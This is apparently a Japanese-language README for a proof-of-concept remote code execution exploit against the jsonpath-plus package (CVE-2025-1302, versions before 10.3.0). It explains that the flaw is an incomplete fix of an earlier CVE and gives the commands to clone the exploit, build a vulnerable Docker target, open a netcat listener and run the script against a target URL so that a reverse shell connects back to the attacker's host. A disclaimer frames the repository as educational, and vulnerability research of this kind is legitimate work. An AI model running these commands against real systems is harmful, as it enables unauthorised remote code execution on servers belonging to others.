
★ CVE-2025-1302 JSONPath-plus RCE PoC ★
https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0
localhost:3000

jsonpath-plus パッケージの 10.3.0 より前のバージョンは、不適切な入力サニタイズにより、リモートコード実行(RCE)の脆弱性があります。攻撃者は、eval='safe' モードの安全でない既定の使用法を悪用して、システム上で任意のコードを実行できます。注: これは、CVE-2024-21534 の不完全な修正が原因です。
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
pip install -r requirements.txt
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>


このリポジトリは、CVE-2025-1302 の RCE エクスプロイトを意図したものではありません。このプロジェクトの目的は、この脆弱性について人々が学び、自身のアプリケーションをテストできるようにすることです。
当社は毎月、CVE とマルウェアの分析情報を公開しています。ご興味があれば、以下のリンクから公開資料をご確認ください。 https://www.skshieldus.com/eng/business/insight.do